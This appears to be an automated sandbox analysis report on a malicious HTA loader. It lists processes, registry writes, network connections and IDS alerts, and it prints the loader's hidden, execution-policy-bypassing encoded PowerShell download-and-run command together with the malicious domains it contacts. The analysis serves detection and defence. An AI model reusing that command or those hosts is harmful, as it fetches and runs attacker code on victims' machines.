| File name: | firmare115.hta |
| Full analysis: | https://app.any.run/tasks/572013cc-8e2a-46b9-b2fc-d8b8f9d83503 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | March 23, 2022, 05:29:47 |
| OS: | Windows 10 Professional (build: 16299, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/html |
| File info: | HTML document, ASCII text, with very long lines, with CRLF line terminators |
| MD5: | 9E8A0ECB11CC4B4A2F03F73E52BCD31C |
| SHA1: | CB83C26372E41DA4F7F9DBBD6278181705C1A8F6 |
| SHA256: | 84085969E3D0EFFDC92707CE694E91400673EA11AC52B1A423BBBA55738A6E95 |
| SSDEEP: | 96:xcX4dqLRZG8n/DY4iTdulbzvRcEEwCE8FfVWoFK/NIvVpe:xcoIRZG8n/DxiRulbzvRcEEwh8FfpFU |
MALICIOUS
Scans artifacts that could help determine the target
- iexplore.exe (PID: 540)
Executes PowerShell scripts
- cmd.exe (PID: 4048)
SUSPICIOUS
Reads Microsoft Outlook installation path
- IEXPLORE.EXE (PID: 2304)
- IEXPLORE.EXE (PID: 3080)
- IEXPLORE.EXE (PID: 2808)
- mshta.exe (PID: 1240)
Checks supported languages
- mshta.exe (PID: 1240)
- conhost.exe (PID: 5380)
- powershell.exe (PID: 1588)
- cmd.exe (PID: 4048)
Reads the computer name
- mshta.exe (PID: 1240)
- powershell.exe (PID: 1588)
Starts CMD.EXE for commands execution
- mshta.exe (PID: 1240)
Reads Environment values
- powershell.exe (PID: 1588)
Drops a file with too old compile date
- powershell.exe (PID: 1588)
Uses RUNDLL32.EXE to load library
- powershell.exe (PID: 1588)
Executable content was dropped or overwritten
- powershell.exe (PID: 1588)
INFO
Reads the computer name
- IEXPLORE.EXE (PID: 3080)
- IEXPLORE.EXE (PID: 424)
- iexplore.exe (PID: 540)
- IEXPLORE.EXE (PID: 2808)
- IEXPLORE.EXE (PID: 2304)
Changes internet zones settings
- iexplore.exe (PID: 540)
Reads internet explorer settings
- IEXPLORE.EXE (PID: 3080)
- IEXPLORE.EXE (PID: 2808)
- mshta.exe (PID: 1240)
Checks Windows Trust Settings
- IEXPLORE.EXE (PID: 2304)
- iexplore.exe (PID: 540)
- powershell.exe (PID: 1588)
Reads settings of System Certificates
- IEXPLORE.EXE (PID: 2304)
- powershell.exe (PID: 1588)
- iexplore.exe (PID: 540)
Checks supported languages
- iexplore.exe (PID: 540)
- IEXPLORE.EXE (PID: 3080)
- IEXPLORE.EXE (PID: 2304)
- IEXPLORE.EXE (PID: 2808)
- IEXPLORE.EXE (PID: 424)
Application launched itself
- IEXPLORE.EXE (PID: 3080)
Reads the software policy settings
- IEXPLORE.EXE (PID: 2304)
- powershell.exe (PID: 1588)
- iexplore.exe (PID: 540)
Reads the date of Windows installation
- iexplore.exe (PID: 540)
Manual execution by user
- mshta.exe (PID: 1240)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .html | | | HyperText Markup Language (100) |
|---|
Total processes
104
Monitored processes
10
Malicious processes
2
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 424 | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:540 CREDAT:529666 /prefetch:2 | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | — | IEXPLORE.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 11.00.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 540 | "C:\Program Files\Internet Explorer\iexplore.exe" "C:\Users\admin\Desktop\firmare115.hta.html" | C:\Program Files\Internet Explorer\iexplore.exe | Explorer.EXE | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 1 Version: 11.00.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 940 | "C:\Windows\System32\rundll32.exe" C:\Users\admin\AppData\Local\Temp\fWBvbmXH.bin,DllRegisterServer | C:\Windows\SysWOW64\rundll32.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1240 | "C:\Windows\SysWOW64\mshta.exe" "C:\Users\admin\Desktop\firmare115.hta" | C:\Windows\SysWOW64\mshta.exe | — | Explorer.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1588 | powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AZQBkAHUAYwBhAHQAaQBvAGwAaQBuAGsALgBjAG8AbQAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA= | C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2304 | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:540 CREDAT:333058 /prefetch:2 | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | IEXPLORE.EXE | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 11.00.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2808 | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:540 CREDAT:82946 /prefetch:2 | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | — | iexplore.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 0 Version: 11.00.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3080 | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:540 CREDAT:17410 /prefetch:2 | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | — | iexplore.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 0 Version: 11.00.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4048 | "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AZQBkAHUAYwBhAHQAaQBvAGwAaQBuAGsALgBjAG8AbQAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA= | C:\Windows\SysWOW64\cmd.exe | — | mshta.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5380 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | \??\C:\WINDOWS\system32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
Total events
7 913
Read events
7 738
Write events
173
Delete events
2
Modification events
| (PID) Process: | (540) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlock |
| Operation: | write | Name: | L1WatermarkLowPart |
Value: 956341420 | |||
| (PID) Process: | (540) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlock |
| Operation: | write | Name: | L1WatermarkHighPart |
Value: 148313293 | |||
| (PID) Process: | (540) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlock |
| Operation: | write | Name: | NextCheckForUpdateLowDateTime |
Value: 444284343 | |||
| (PID) Process: | (540) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlock |
| Operation: | write | Name: | NextCheckForUpdateHighDateTime |
Value: 30948983 | |||
| (PID) Process: | (540) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (540) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (540) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (540) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main |
| Operation: | write | Name: | CompatibilityFlags |
Value: 0 | |||
| (PID) Process: | (540) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (540) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
Executable files
1
Suspicious files
15
Text files
7
Unknown types
11
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 540 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF5F5CA45E5112F588.TMP | gmc | |
MD5:— | SHA256:— | |||
| 2304 | IEXPLORE.EXE | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63 | binary | |
MD5:— | SHA256:— | |||
| 540 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Last Active\{4637D900-AA6A-11EC-B4A7-18F7786F96EE}.dat | binary | |
MD5:— | SHA256:— | |||
| 540 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF338411A1743B4455.TMP | gmc | |
MD5:— | SHA256:— | |||
| 540 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF81849ADFE50097BB.TMP | gmc | |
MD5:— | SHA256:— | |||
| 540 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Last Active\RecoveryStore.{4637D8FE-AA6A-11EC-B4A7-18F7786F96EE}.dat | binary | |
MD5:— | SHA256:— | |||
| 540 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{4637D8FD-AA6A-11EC-B4A7-18F7786F96EE}.dat | binary | |
MD5:— | SHA256:— | |||
| 2304 | IEXPLORE.EXE | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63 | der | |
MD5:— | SHA256:— | |||
| 540 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DFE17A7F417A8566E9.TMP | gmc | |
MD5:— | SHA256:— | |||
| 540 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DFA3350F3C81A830A8.TMP | gmc | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
18
DNS requests
14
Threats
4
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
540 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | US | der | 471 b | whitelisted |
540 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAqvpsXKY8RRQeo74ffHUxc%3D | US | der | 471 b | whitelisted |
2304 | IEXPLORE.EXE | GET | 302 | 104.91.16.50:80 | http://go.microsoft.com/fwlink/?LinkId=838604 | US | — | — | whitelisted |
1588 | powershell.exe | GET | 200 | 62.173.154.202:80 | http://educatiolink.com/index.php | RU | text | 202 b | suspicious |
2304 | IEXPLORE.EXE | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8Ull8gIGmZT9XHrHiJQeI%3D | US | der | 1.47 Kb | whitelisted |
1588 | powershell.exe | GET | 200 | 62.173.140.43:80 | http://educationlink.xyz/readme.txt | RU | executable | 654 Kb | malicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2304 | IEXPLORE.EXE | 104.91.16.50:80 | go.microsoft.com | Akamai Technologies, Inc. | US | suspicious |
2304 | IEXPLORE.EXE | 104.91.16.50:443 | go.microsoft.com | Akamai Technologies, Inc. | US | suspicious |
2092 | WaaSMedic.exe | 20.49.150.241:443 | settings-win.data.microsoft.com | — | US | malicious |
2092 | WaaSMedic.exe | 20.73.194.208:443 | — | — | US | whitelisted |
5952 | svchost.exe | 20.49.150.241:443 | settings-win.data.microsoft.com | — | US | malicious |
2304 | IEXPLORE.EXE | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
5092 | sihclient.exe | 40.125.122.176:443 | sls.update.microsoft.com | Microsoft Corporation | US | suspicious |
1588 | powershell.exe | 62.173.154.202:80 | educatiolink.com | JSC Internet-Cosmos | RU | suspicious |
540 | iexplore.exe | 20.73.128.142:443 | c.urs.microsoft.com | — | US | suspicious |
540 | iexplore.exe | 152.199.19.161:443 | iecvlist.microsoft.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
go.microsoft.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
time.windows.com |
| whitelisted |
sls.update.microsoft.com |
| whitelisted |
educatiolink.com |
| suspicious |
educationlink.xyz |
| malicious |
iecvlist.microsoft.com |
| whitelisted |
c.urs.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
1588 | powershell.exe | Potentially Bad Traffic | ET INFO Request to .XYZ Domain with Minimal Headers |
1588 | powershell.exe | Potentially Bad Traffic | ET INFO Terse Request for .txt - Likely Hostile |
1588 | powershell.exe | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain |
1 ETPRO signatures available at the full report